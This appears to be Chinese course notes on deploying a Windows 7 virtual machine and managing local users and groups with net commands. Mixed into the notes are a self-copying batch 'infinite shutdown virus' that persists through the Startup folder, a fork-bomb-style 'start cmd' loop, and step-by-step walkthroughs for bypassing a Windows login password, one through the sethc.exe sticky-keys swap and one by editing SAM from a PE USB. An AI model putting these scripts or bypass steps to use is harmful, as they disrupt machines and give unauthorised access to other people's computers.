03 win7部署&用户和组管理

1. 部署win7虚拟机

  • 新建文件夹,给win7建立一个虚拟家目录

  • 下载好win7镜像,msdn提供下载

  • 新建虚拟机,并将内存改为512m或1G,插入下载好的镜像

  • 开机,安装系统

  • 安装vm tools,重启

  • 关闭防火墙

  • 关闭自动更新

  • 调出桌面图标

  • 关机,做快照

2. 用户与组管理

用户对应着当前使用电脑的身份,不同的身份有着不同的权限。

2.1 服务器版本介绍

windows服务器系统:win2000 win2003 win2008 win2012

其中win2000市面上基本上没有用的啦,win2012和win2008功能差不多,只是桌面不一样

linux服务器系统:Redhat Centos

2.2 用户描述

  • 每一个用户登录系统后,拥有不同的操作权限

  • 每一个用户有自己唯一的SID(安全标识符)

  • 用户SID: S-1-5-21-426206823-2579496042-14852678-500

  • 系统SID: S-1-5-21-426206823-2579496042-14852671

    windows系统管理员administrator的UID是500
    普通用户的UID是1000开始
    
  • 不同的账户拥有不同的权限,为不同的账户赋权限,也就是为不用账户的SID赋权限

  • 查看用户: whoami

  • 查看SID值: whoami /user

  • 账户密码存储位置: c:\windows\system32\config\SAM #暴力破解/撞库

  • windows系统上,默认密码最长有效期42天

2.3 内置账户

  • 给人使用的账户:

    • Administrator #管理员账户
    • guest #来宾账户
  • 计算机服务组件相关的系统账号

    • system #系统账户==权限至高无上
    • local services #本地服务账户==权限等于普通用户
    • network services #网络服务账户==权限等于普通用户

注意: 内置账号是不能删除的

2.4 配置文件

每个用户都有自己的配置文件(家目录),在用户第一次登录时自动产生,路径是:

win7/win2008 c:\用户

xp/win2003 c:\Documents and Settings\

2.5 用户管理命令

net user                           # 查看用户列表
net user 用户名 密码                 # 改密码
net user 用户名 密码 /add              # 创建一个新用户
net user 用户名 /de1                 # 删除一个用户
net user 用户名 /active:yes/no      # 激活或禁用账户
练习;
1、练习图形及命令行中,进行用户管理(包括创建、修改密码、删除用户、登录并验证家目录产生、及权限)
2、制作一个批处理脚本,可以实现互动创建用户!

无限关机病毒最终版

@echo off
copy mm.bat "%userprofile%\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup"  

# 启动项路径最终版
# win7/win10都是这个路径,userprofile --> 当前用户配置文件的路径
shutdown -s -f -t 0

2.6 组管理

组的作用: 简化权限的赋予。

赋权限方式:

  • 用户 ---> 组 ---> 赋权限
  • 用户 ---> 赋权限

2.6.1 内置组

内置组的权限默认已经被系统赋予。

1) administrators         #管理员组
2) guests                 #来宾组
3) users                  #普通用户组,默认新建用户都属于该组
4) network                #网络配置组
5) print                  #打印机组
6) Remote Desktop         #远程桌面组

2.6.2 组管理命令

net localgroup                           #查看组列表
net 1ocalgroup 组名                       #查看该组的成员
net 1ocalgroup 组名 /add                  #创建一个新的组
net 1ocalgroup 组名 用户名 /add            #添加用户到组
net 1ocalgroup 组名 用户名 /del            #从组中踢出用户
net 1ocalgroup 组名 /del                  #删除组
练习:
1、练习图形及命令行中,进行组管理(创建组、组成员添加、查看组成员、成员脱离组、删除组)
2、创建1个普通用户1isi,并将1isi提升为管理员,并验证lisi是否成功取得管理员权限!

3. win7/win10破解开机密码

1、在未登录系统时,连续按5次shift键, 弹出程序C:\windows\system32\sethc.exe
2、部分win7及win10系统在未进入系统时,可以通过系统修复漏洞篡改系统文件名!
注:如win7或win10系统已修补漏洞2,则无法利用

3.1 破解过程相关知识

  1. cmd工具路径
C: windows\system32\cmd
2、用户/账户密码存储位置
c:\windows\system32\config\SAM
#非逆转型加密、使用hash值类似的方法、MD5 SHA
  1. 修改账户密码:
net user 用户名 新密码

3.2 漏洞利用过程

案例:破解win7系统密码
实验步骤:
1、开启win7虚拟机,开机,并设置一个复杂密码:
2、关机,并开机,在出现windows启动界面时强制关机;
3、再开机,出现“启动修复(推荐)”及选择该项: #如为出现,多尝试儿次第2步,如还不行,请换其他方法
4、出现系统还原提示,点击取消,等待几分钟后,会出现问题原因,点击查看详细信息:
5、打开最后一个链接即一个记事本:
6、记事本中点打开,并选择显示所有文件:
7、找到sethc并改名sethc-bak,再找到cmd, 复制一份cmd改名为sethc
8、全部关闭,重启。
9、系统启动完毕后,连续按5次shift键,将弹出cmd工具,使用命令net user 用户名 新密码,将当前用户密码修改掉即可,或者另外建立1个用户,并提升为管理员,注销后,可再删除新建的用户,这样的好处为不修改当前用户的密码即可登录系统。

4. 冒号和goto的用法

: 用来划分区块

goto 用来跳转

如果你有编程基础, 你可以理解成是定义函数, 以及调用函数

编写一个有菜单选择的批处理文件:

@echo off
color 0a
title mn小程序

:menu
cls
echo ==================================
echo            1.定时关机
echo            2.蓝屏炸弹
echo            3.创建用户
echo            4.退出程序
echo ==================================
set /p num=请输入你的选择:

if "%num%"=="1" goto a
if "%num%"=="2" goto b
if "%num%"=="3" goto c
if "%num%"=="4" goto d
echo 他妈的,不看序号的吗?傻逼,乱输入,看清楚点.
pause
goto menu

:a
set /p time=请输入关机倒计时(单位:秒,时间不能大于1000):
shutdown -s -f -t %time%
goto menu

:b
echo 我是蓝屏炸弹
goto menu


:c
set /p user=请输入用户名:
set /p pwd=请输入密码:
net user %user% %pwd% /add
echo 用户%user%已经创建成功!
pause
goto menu

:d
exit
# 无限打开cmd,暴力破坏电脑
:a
start cmd
goto a

5. 破解登录密码

  • 假装忘记密码!

  • 第一步: 准备一个空U盘(记着备份u盘中的数据)

  • 第二步: 准备一个PE系统制作工具(新与18可以破解的系统版本不一样)链接

    • xp pe/win 7 pe/win10pe (老毛桃,大白菜,U深度)
    • PE系统: 微型维修系统, 将PE系统安装到U盘中,虚拟机的话是一个ISO文件
  • 第三步: 插入U盘,并运行pe软件,然后点击一键安装! 此时u盘就变成了pe启动盘

  • 第四步: 将U盘插入要破解密码的电脑设备上!

  • 第五步:开机,马上立即赶紧狂按E2或者F1或者esc,进入bios ( 虚拟机直接进入固件 ), 去修改启动顺序!

  • 第六步:开机,进入PE系统,此时你也可以看见一个桌面,桌面上一般有一个篡改SAM文件的工具,运行这个工具,并打开sam文件,直接修改密码!

  • 第七步:拔掉U盘 ( 虚拟机是把两个连接取消 ), 重启电脑

03 win7部署&用户和组管理

上一篇:【C#】当前用户是否有管理员权限:WindowsPrincipal


下一篇:C# UTF8的BOM导致XML序列化与反序列化报错:Data at the root level is invalid. Line 1, position 1.